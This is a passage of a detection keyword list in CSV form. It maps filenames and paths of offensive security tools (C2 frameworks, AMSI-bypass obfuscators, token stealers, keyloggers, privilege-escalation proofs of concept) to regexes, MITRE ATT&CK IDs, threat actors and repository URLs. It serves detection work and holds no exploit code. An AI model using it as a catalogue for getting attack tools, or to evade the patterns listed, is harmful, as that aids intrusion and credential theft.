which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","10","10","750","141","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z" "*/TikiSpawn.*",".{0,1000}\/TikiSpawn\..{0,1000}","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. 
which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","10","10","750","141","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z" "*/TikiSpawn/*",".{0,1000}\/TikiSpawn\/.{0,1000}","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. 
which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","10","10","750","141","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z" "*/timeoutpwn64*",".{0,1000}\/timeoutpwn64.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","5246","1068","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z" "*/timestomp.py*",".{0,1000}\/timestomp\.py.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","166","35","2024-04-25T14:30:04Z","2022-01-24T20:44:38Z" "*/timestomping.ps1*",".{0,1000}\/timestomping\.ps1.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6490","759","2024-04-29T11:28:16Z","2015-08-30T07:22:51Z" "*/timwr/CVE-2016-5195*",".{0,1000}\/timwr\/CVE\-2016\-5195.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/timwr/CVE-2016-5195","1","1","N/A","N/A","10","942","392","2021-02-03T16:03:40Z","2016-10-21T11:19:21Z" "*/tinar.py*",".{0,1000}\/tinar\.py.{0,1000}","offensive_tool_keyword","ThisIsNotRat","control windows computer from telegram","T1098 - T1079 - T1105 - T1047 - T1059","TA0010 - TA0009 - TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/RealBey/ThisIsNotRat","1","0","N/A","9","10","61","20","2023-09-10T07:39:38Z","2023-09-07T14:07:32Z" "*/tls-alpn.nse*",".{0,1000}\/tls\-alpn\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/tls-nextprotoneg.nse*",".{0,1000}\/tls\-nextprotoneg\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/tls-ticketbleed.nse*",".{0,1000}\/tls\-ticketbleed\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/tmmmp *",".{0,1000}\/tmmmp\s.{0,1000}","offensive_tool_keyword","OMGLogger","Key logger which sends each and every key stroke of target remotely/locally.","T1056.001 - T1562.001","TA0004 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/OMGLogger","1","0","N/A","10","7","698","247","2024-04-28T21:51:02Z","2021-09-08T20:33:18Z" "*/tmp/*-passwords.txt*",".{0,1000}\/tmp\/.{0,1000}\-passwords\.txt.{0,1000}","offensive_tool_keyword","DefaultCreds-cheat-sheet","One place for all the default credentials to assist the Blue/Red teamers activities on finding devices with default password","T1110.001 - T1110.003","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/ihebski/DefaultCreds-cheat-sheet","1","0","N/A","N/A","10","5272","667","2024-04-29T16:57:49Z","2021-01-01T19:02:36Z" "*/tmp/*-usernames.txt*",".{0,1000}\/tmp\/.{0,1000}\-usernames\.txt.{0,1000}","offensive_tool_keyword","DefaultCreds-cheat-sheet","One place for all the default credentials to assist the Blue/Red teamers activities on finding devices with default password","T1110.001 - T1110.003","TA0006 - 
TA0007","N/A","N/A","Credential Access","https://github.com/ihebski/DefaultCreds-cheat-sheet","1","0","N/A","N/A","10","5272","667","2024-04-29T16:57:49Z","2021-01-01T19:02:36Z" "*/tmp/.manspider*",".{0,1000}\/tmp\/\.manspider.{0,1000}","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","8","10","926","126","2024-02-27T16:16:14Z","2020-03-18T13:27:20Z" "*/tmp/amass.zip*",".{0,1000}\/tmp\/amass\.zip.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","84","11","2024-03-01T11:51:24Z","2021-11-15T13:40:56Z" "*/tmp/bin/csprecon*",".{0,1000}\/tmp\/bin\/csprecon.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","84","11","2024-03-01T11:51:24Z","2021-11-15T13:40:56Z" "*/tmp/bin/subfinder*",".{0,1000}\/tmp\/bin\/subfinder.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","84","11","2024-03-01T11:51:24Z","2021-11-15T13:40:56Z" "*/tmp/borg_d3monized*",".{0,1000}\/tmp\/borg_d3monized.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - 
TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","0","N/A","10","3","258","32","2024-03-01T14:29:25Z","2023-05-30T02:30:47Z" "*/tmp/c2-rebind.so*",".{0,1000}\/tmp\/c2\-rebind\.so.{0,1000}","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","0","N/A","10","10","2127","327","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z" "*/tmp/chimera.ps1*",".{0,1000}\/tmp\/chimera\.ps1.{0,1000}","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","0","N/A","10","10","1309","228","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" "*/tmp/dcow *",".{0,1000}\/tmp\/dcow\s.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/timwr/CVE-2016-5195","1","0","N/A","N/A","10","942","392","2021-02-03T16:03:40Z","2016-10-21T11:19:21Z" "*/tmp/evil.sh*",".{0,1000}\/tmp\/evil\.sh.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","N/A","7","10","1967","343","2024-05-01T05:24:28Z","2020-05-13T11:28:52Z" "*/tmp/exploit*",".{0,1000}\/tmp\/exploit.{0,1000}","offensive_tool_keyword","POC","local privilege escalation Proof-of-Concept exploit for CVE-2024-1086 working on most Linux kernels between v5.14 and v6.6","T1068 - T1548.002","TA0004","N/A","N/A","Privilege Escalation","https://github.com/Notselwyn/CVE-2024-1086","1","0","CVE-2024-1086 POC","10","10","1898","237","2024-04-17T16:09:54Z","2024-03-20T21:16:41Z" 
"*/tmp/FavFreak/*",".{0,1000}\/tmp\/FavFreak\/.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","84","11","2024-03-01T11:51:24Z","2021-11-15T13:40:56Z" "*/tmp/geckodriver.tar.gz*",".{0,1000}\/tmp\/geckodriver\.tar\.gz.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","84","11","2024-03-01T11:51:24Z","2021-11-15T13:40:56Z" "*/tmp/gitleaks*",".{0,1000}\/tmp\/gitleaks.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","84","11","2024-03-01T11:51:24Z","2021-11-15T13:40:56Z" "*/tmp/gtfokey.pub*",".{0,1000}\/tmp\/gtfokey\.pub.{0,1000}","offensive_tool_keyword","GTFONow","Automatic privilege escalation for misconfigured capabilities - sudo and suid binaries using GTFOBins.","T1548.003 - T1548.002 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Frissi0n/GTFONow","1","0","N/A","6","10","N/A","N/A","N/A","N/A" "*/tmp/host.ghost*",".{0,1000}\/tmp\/host\.ghost.{0,1000}","offensive_tool_keyword","GhostInTheNet","Ultimate Network Stealther that makes Linux a Ghost In The Net and protects from MITM/DOS/scan","T1574 - T1565 - T1055","TA0007 - TA0040 - TA0043","N/A","N/A","Sniffing & Spoofing","https://github.com/cryptolok/GhostInTheNet","1","0","N/A","7","4","364","85","2023-04-27T07:07:29Z","2017-04-22T01:53:16Z" "*/tmp/libpwn.c*",".{0,1000}\/tmp\/libpwn\.c.{0,1000}","offensive_tool_keyword","GTFONow","Automatic privilege escalation for misconfigured capabilities - sudo and suid binaries using GTFOBins.","T1548.003 - T1548.002 - 
T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Frissi0n/GTFONow","1","0","N/A","6","10","N/A","N/A","N/A","N/A" "*/tmp/libpwn.so*",".{0,1000}\/tmp\/libpwn\.so.{0,1000}","offensive_tool_keyword","GTFONow","Automatic privilege escalation for misconfigured capabilities - sudo and suid binaries using GTFOBins.","T1548.003 - T1548.002 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Frissi0n/GTFONow","1","0","N/A","6","10","N/A","N/A","N/A","N/A" "*/tmp/mac.ghost*",".{0,1000}\/tmp\/mac\.ghost.{0,1000}","offensive_tool_keyword","GhostInTheNet","Ultimate Network Stealther that makes Linux a Ghost In The Net and protects from MITM/DOS/scan","T1574 - T1565 - T1055","TA0007 - TA0040 - TA0043","N/A","N/A","Sniffing & Spoofing","https://github.com/cryptolok/GhostInTheNet","1","0","N/A","7","4","364","85","2023-04-27T07:07:29Z","2017-04-22T01:53:16Z" "*/tmp/metadata/na.elf*",".{0,1000}\/tmp\/metadata\/na\.elf.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","10","10","296","38","2024-04-30T22:07:23Z","2022-10-08T19:02:58Z" "*/tmp/metasploit_install*",".{0,1000}\/tmp\/metasploit_install.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*/tmp/p0f.log*",".{0,1000}\/tmp\/p0f\.log.{0,1000}","offensive_tool_keyword","p0f","P0f is a tool that utilizes 
an array of sophisticated purely passive traffic fingerprinting mechanisms to identify the players behind any incidental TCP/IP communications","T1046 - T1040","TA0007 - TA0010","N/A","N/A","Sniffing & Spoofing","https://www.kali.org/tools/p0f/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/tmp/payload.bin*",".{0,1000}\/tmp\/payload\.bin.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*/tmp/payload.ps1*",".{0,1000}\/tmp\/payload\.ps1.{0,1000}","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","0","N/A","10","10","1309","228","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" "*/tmp/payload.txt*",".{0,1000}\/tmp\/payload\.txt.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*/tmp/Phishing/documentation.pdf.zip*",".{0,1000}\/tmp\/Phishing\/documentation\.pdf\.zip.{0,1000}","offensive_tool_keyword","mail-in-the-middle","This script sits in the middle between a legitimate sender of an email and the legitimate recipient of that email. 
This means that we (the attackers) are receiving sensitive information not originally destined to us","T1557 - T1598.002 - T1566.002 - T1192 - T1204.002 - T1539 - T1593","TA0001 - TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/sensepost/mail-in-the-middle","1","0","N/A","8","1","78","9","2024-04-01T15:28:44Z","2024-02-21T07:25:37Z" "*/tmp/r00tshell*",".{0,1000}\/tmp\/r00tshell.{0,1000}","offensive_tool_keyword","exploit-db","privilege escalation exploit pattern on https://www.exploit-db.com/exploits/38576","T1068 - T1548 - T1055 - T1088 - T1134 - T1221 - T1543 - T1547 - T1574","TA0004 - TA0005 - TA0009","N/A","N/A","Privilege Escalation","https://www.exploit-db.com/exploits/38576","1","0","linux privesc","10","10","N/A","N/A","N/A","N/A" "*/tmp/resolution.txt*server.sh*",".{0,1000}\/tmp\/resolution\.txt.{0,1000}server\.sh.{0,1000}","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - T1110 - T1555 - T1204 - T1592","TA0001 - TA0006 - TA0009","N/A","N/A","Phishing","https://github.com/JoelGMSec/EvilnoVNC","1","0","N/A","9","8","717","126","2024-03-21T10:05:50Z","2022-09-04T10:48:49Z" "*/tmp/revshell.exe*",".{0,1000}\/tmp\/revshell\.exe.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","0","N/A","10","10","859","144","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z" "*/tmp/scanrepo.tar.gz*",".{0,1000}\/tmp\/scanrepo\.tar\.gz.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","84","11","2024-03-01T11:51:24Z","2021-11-15T13:40:56Z" 
"*/tmp/smb_auth_temp_*.txt*",".{0,1000}\/tmp\/smb_auth_temp_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","SMBCrunch","SMBCrunch allows a red teamer to quickly identify Windows File Shares in a network - performs a recursive directory listing of the provided shares and can even grab a file from the remote share if it looks like a juicy target.","T1021.002 - T1005 - T1210","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Lateral Movement","https://github.com/Raikia/SMBCrunch","1","0","N/A","9","2","162","26","2018-03-07T15:50:12Z","2016-03-25T10:10:19Z" "*/tmp/tmpfolder/pingoor.c*",".{0,1000}\/tmp\/tmpfolder\/pingoor\.c.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","0","N/A","10","3","258","32","2024-03-01T14:29:25Z","2023-05-30T02:30:47Z" "*/tmp/tmpfolder/pingoor.h*",".{0,1000}\/tmp\/tmpfolder\/pingoor\.h.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","0","N/A","10","3","258","32","2024-03-01T14:29:25Z","2023-05-30T02:30:47Z" "*/tmp/truffleHog.tar.gz*",".{0,1000}\/tmp\/truffleHog\.tar\.gz.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - 
TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","84","11","2024-03-01T11:51:24Z","2021-11-15T13:40:56Z" "*/tmp/vt-post-*.txt*",".{0,1000}\/tmp\/vt\-post\-.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","0","N/A","10","10","1309","228","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" "*/tmp/vt-results-*.txt*",".{0,1000}\/tmp\/vt\-results\-.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","0","N/A","10","10","1309","228","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" "*/tmp/wordlist.txt*",".{0,1000}\/tmp\/wordlist\.txt.{0,1000}","offensive_tool_keyword","remote-method-guesser","remote-method-guesser (rmg) is a Java RMI vulnerability scanner and can be used to identify and verify common security vulnerabilities on Java RMI endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","773","101","2024-04-20T20:46:48Z","2019-11-04T11:37:38Z" "*/tn3270-screen.nse*",".{0,1000}\/tn3270\-screen\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/TokenPlayer.git*",".{0,1000}\/TokenPlayer\.git.{0,1000}","offensive_tool_keyword","TokenPlayer","Manipulating and Abusing Windows Access Tokens","T1134 - T1484 - T1055 - T1078","TA0004 - TA0005 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S1ckB0y1337/TokenPlayer","1","1","N/A","10","3","254","46","2021-01-15T16:07:47Z","2020-08-20T23:05:49Z" "*/TokenStealer.git*",".{0,1000}\/TokenStealer\.git.{0,1000}","offensive_tool_keyword","TokenStealer","stealing Windows tokens","T1134 - T1055","TA0003 - TA0004","N/A","N/A","Credential Access","https://github.com/decoder-it/TokenStealer","1","1","N/A","10","2","154","24","2023-10-25T14:08:57Z","2023-10-24T13:06:37Z" "*/TokenStealing*",".{0,1000}\/TokenStealing.{0,1000}","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","1","N/A","10","7","673","104","2024-04-23T03:05:39Z","2021-12-28T13:14:25Z" "*/TokenStomp.exe*",".{0,1000}\/TokenStomp\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/TokenStripBOF*",".{0,1000}\/TokenStripBOF.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File to delete token privileges and lower the integrity level to untrusted for a specified process","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 